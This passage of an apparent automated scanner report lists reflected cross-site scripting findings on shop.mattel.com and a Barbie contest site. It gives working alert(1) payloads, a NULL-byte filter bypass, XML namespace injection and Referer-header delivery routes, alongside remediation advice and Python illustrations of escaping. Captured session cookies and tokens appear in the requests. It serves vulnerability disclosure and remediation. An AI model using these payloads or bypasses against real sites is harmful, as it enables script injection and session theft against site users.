Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43932
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.67. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/product/wishlist/wishlist.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a7af6--><script>alert(1)</script>e0edaf36a48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product/wishlist/wishlist.jsp?a7af6--><script>alert(1)</script>e0edaf36a48=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:59 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:06 GMT; path=/ Content-Language: en X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:/ ...[SNIP]... <!-- === Request Query String: a7af6--><script>alert(1)</script>e0edaf36a48=1 --> ...[SNIP]...
1.68. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/product/wishlist/wishlist.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008cdef"-alert(1)-"d3ac09be35f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cdef"-alert(1)-"d3ac09be35f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where a NULL byte terminates the string: the filter stops inspecting at the %00, while the Java application behind it (the response advertises Servlet/2.5 and JSP/2.1) processes the whole string and reflects everything after the NULL, which is itself dropped on output here. Fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /product/wishlist/wishlist.jsp?%008cdef"-alert(1)-"d3ac09be35f=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:58 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:05 GMT; path=/ Content-Language: en X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.69. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/storeLocator/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e26"-alert(1)-"8e17875d268 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
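The following is an added illustration serving findings 1.68 and 1.69; it is not code from the scanned application or from any WAF vendor. It models a native-code filter that stops reading at the first NUL byte next to a Java-style decoder that keeps the whole string, which is why the %00-prefixed payload passes the filter yet is reflected, and it shows the escaping that makes a value inert inside a double-quoted JavaScript string. The blocked-pattern list and the `ess.param` assignment are assumptions; the payloads are the ones from the two findings.

```python
import re
from urllib.parse import unquote_to_bytes

# Added example (not the scanned application's code or any vendor's WAF):
# a model of why a NUL byte slips a payload past a native-code filter, and
# the JavaScript-string escaping that makes the reflection inert.
PAYLOAD_PLAIN = '79e26"-alert(1)-"8e17875d268'        # finding 1.69
PAYLOAD_NUL = '%008cdef"-alert(1)-"d3ac09be35f'      # finding 1.68

# Assumed signature list; real WAF rules are larger but share the weakness.
BLOCKED = re.compile(rb'alert\s*\(|<script', re.IGNORECASE)


def native_filter_blocks(raw_param: str) -> bool:
    """Filter modelled on C string handling: percent-decode the parameter,
    then inspect only the bytes before the first NUL, as strstr() would."""
    decoded = unquote_to_bytes(raw_param)
    visible = decoded.split(b"\x00", 1)[0]
    return BLOCKED.search(visible) is not None


def app_decodes(raw_param: str) -> str:
    """Length-counted decoding as in Java: nothing after the NUL is lost.
    The finding shows the NUL itself vanishing on output, modelled by strip."""
    return unquote_to_bytes(raw_param).decode("latin-1").replace("\x00", "")


def reflect_unsafe(value: str) -> str:
    """Value dropped straight into a double-quoted JS string literal."""
    return f'var ess = {{}}; ess.param = "{value}";'


def js_string_escape(value: str) -> str:
    """Escape for a double-quoted JS string: backslash, both quote characters,
    '<', '>', '&', '/', control characters and the JS line terminators become
    \\xHH or \\uHHHH, so the value can neither end the string literal nor the
    enclosing <script> element."""
    out = []
    for ch in value:
        code = ord(ch)
        if ch in '\\"\'<>&/' or code < 0x20 or ch in "\u2028\u2029":
            out.append(f"\\x{code:02x}" if code < 0x100 else f"\\u{code:04x}")
        else:
            out.append(ch)
    return "".join(out)


def reflect_safe(value: str) -> str:
    return f'var ess = {{}}; ess.param = "{js_string_escape(value)}";'


def breaks_out_of_string(script: str) -> bool:
    """True if the text after the literal is anything but the terminating ';',
    i.e. the attacker's input is being parsed as code rather than data."""
    m = re.search(r'ess\.param = "((?:[^"\\]|\\.)*)"(.*)$', script)
    return m is None or m.group(2) != ";"


if __name__ == "__main__":
    for p in (PAYLOAD_PLAIN, PAYLOAD_NUL):
        print(p, "blocked:", native_filter_blocks(p),
              "breaks out:", breaks_out_of_string(reflect_unsafe(app_decodes(p))))
```

Note that the NUL-byte bypass is a property of the filter, not of the page: the same JS-string escaping applied in the template neutralises the payload whether or not a WAF sits in front.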
Request
GET /storeLocator/index.jsp?79e26"-alert(1)-"8e17875d268=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:56 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 40857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.70. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.mattel.com
Path:
/storeLocator/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 163a7--><script>alert(1)</script>cd69434ff01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. As in 1.67, the --> in the parameter name ends the comment and the script element that follows is rendered as markup.
Request
GET /storeLocator/index.jsp?163a7--><script>alert(1)</script>cd69434ff01=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:11:57 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 40821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: 163a7--><script>alert(1)</script>cd69434ff01=1 --> ...[SNIP]...
The value of the count request parameter is copied into the XML document as plain text between tags. The payload dd6a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f87dd1d1038a469c5 was submitted in the count parameter. This input was echoed as dd6a0<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f87dd1d1038a469c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /get_contest_entries?xml=1&count=5dd6a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f87dd1d1038a469c5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=1&page=1 HTTP/1.1 Host: videogirlcontest.barbie.com Proxy-Connection: keep-alive Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 3275 Content-Type: text/xml; charset=utf-8 Expires: Thu, 23 Dec 2010 00:12:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 23 Dec 2010 00:12:26 GMT Connection: close Set-Cookie: session=4d1293eaf95db56a; path=/; expires=Thu, 23-Dec-2010 00:42:26 GMT
The value of the page request parameter is copied into the XML document as plain text between tags. The payload %0077700<a%20xmlns%3aa%3d"http%3a//www.w3.org/1999/xhtml"><a%3abody%20onload%3d"alert(1)"/></a>75baf303698aec4c7 was submitted in the page parameter. This input was echoed as 77700<a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a>75baf303698aec4c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where a NULL byte terminates the string: the filter stops inspecting at the %00, while the application behind it processes the whole string and reflects everything after the NULL, which is itself dropped on output here. Fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass. For these two parameters the application fix is straightforward, since count and page are numeric and anything that is not an integer can simply be rejected.
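The following is an added illustration for the two get_contest_entries findings above (count and page); it is not the contest application's code. It places the count payload from the report into a constructed XML response by string concatenation, parses the result the way a namespace-aware consumer would, and shows that an element in the XHTML namespace with an onload handler now exists; the escaped and the validated renderings yield none. The document layout (`<entries>`, `<count>`, `<page>`) is an assumption; only the payload and the parameter names come from the report.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Added example (not the contest application's code): the count-parameter
# payload from the finding rendered into a constructed XML response three
# ways. XHTML_NS is the namespace the payload declares.
XHTML_NS = "http://www.w3.org/1999/xhtml"
PAYLOAD = ("5dd6a0<a xmlns:a='http://www.w3.org/1999/xhtml'>"
           "<a:body onload='alert(1)'/></a>f87dd1d1038a469c5")


def render_unsafe(count: str, page: str) -> str:
    """Echoes the parameters as raw text between tags, as the finding shows."""
    return f"<entries><count>{count}</count><page>{page}</page></entries>"


def render_escaped(count: str, page: str) -> str:
    """Same document with XML text escaping: '<' and '&' can no longer open
    an element, so the input cannot declare a namespace or an element."""
    return f"<entries><count>{escape(count)}</count><page>{escape(page)}</page></entries>"


def render_validated(count: str, page: str) -> str:
    """Stricter fix for these particular parameters: both are numeric, so
    anything that is not a non-negative integer is rejected before rendering."""
    if not (count.isdigit() and page.isdigit()):
        raise ValueError("count and page must be non-negative integers")
    return render_unsafe(count, page)


def validated_accepts(count: str, page: str) -> bool:
    try:
        render_validated(count, page)
        return True
    except ValueError:
        return False


def foreign_elements(document: str) -> list:
    """Elements in the XHTML namespace together with their on* attributes:
    what a browser rendering the response directly could treat as HTML."""
    root = ET.fromstring(document)
    found = []
    for el in root.iter():
        if el.tag.startswith("{%s}" % XHTML_NS):
            handlers = {k: v for k, v in el.attrib.items() if k.startswith("on")}
            found.append((el.tag, handlers))
    return found


if __name__ == "__main__":
    print(foreign_elements(render_unsafe(PAYLOAD, "1")))
    print(foreign_elements(render_escaped(PAYLOAD, "1")))
    print(validated_accepts(PAYLOAD, "1"), validated_accepts("5", "1"))
```

Serving the XML with a Content-Disposition: attachment header, or only ever to the Flash client with a content type the browser will not render, reduces the standalone-response risk the finding describes, but does not replace encoding or validating the echoed values.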
Request
GET /get_contest_entries?xml=1&count=5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=2&page=1%0077700<a%20xmlns%3aa%3d"http%3a//www.w3.org/1999/xhtml"><a%3abody%20onload%3d"alert(1)"/></a>75baf303698aec4c7 HTTP/1.1 Host: videogirlcontest.barbie.com Proxy-Connection: keep-alive Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 6787 Content-Type: text/xml; charset=utf-8 Expires: Thu, 23 Dec 2010 00:12:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 23 Dec 2010 00:12:31 GMT Connection: close Set-Cookie: session=4d1293ee9ab6f3c0; path=/; expires=Thu, 23-Dec-2010 00:42:30 GMT
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714b8"><script>alert(1)</script>8c42dd9f9f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past for using client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. Otherwise the Referer value is simply the URL of the page the browser came from, so an attacker-hosted page whose URL carries the payload is the other delivery route to consider; whether the quotes and angle brackets arrive unencoded depends on how the victim's browser encodes that URL in the header. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=714b8"><script>alert(1)</script>8c42dd9f9f3
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:36 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=714b8"><script>alert(1)</script>8c42dd9f9f3;u2=1;u3=;u1=;ord=1;num=99400337?" width="1" height="1" frameborder="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae536"><script>alert(1)</script>9892daaa3cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past for using client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; if such a technique is available, it can probably be leveraged to exploit this XSS flaw. Otherwise the Referer value is simply the URL of the page the browser came from, so an attacker-hosted page whose URL carries the payload is the other delivery route to consider; whether the quotes and angle brackets arrive unencoded depends on how the victim's browser encodes that URL in the header. This limitation partially mitigates the impact of the vulnerability.
Request
GET /cartHandler/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530; Referer: http://www.google.com/search?hl=en&q=ae536"><script>alert(1)</script>9892daaa3cd
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:34 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45101
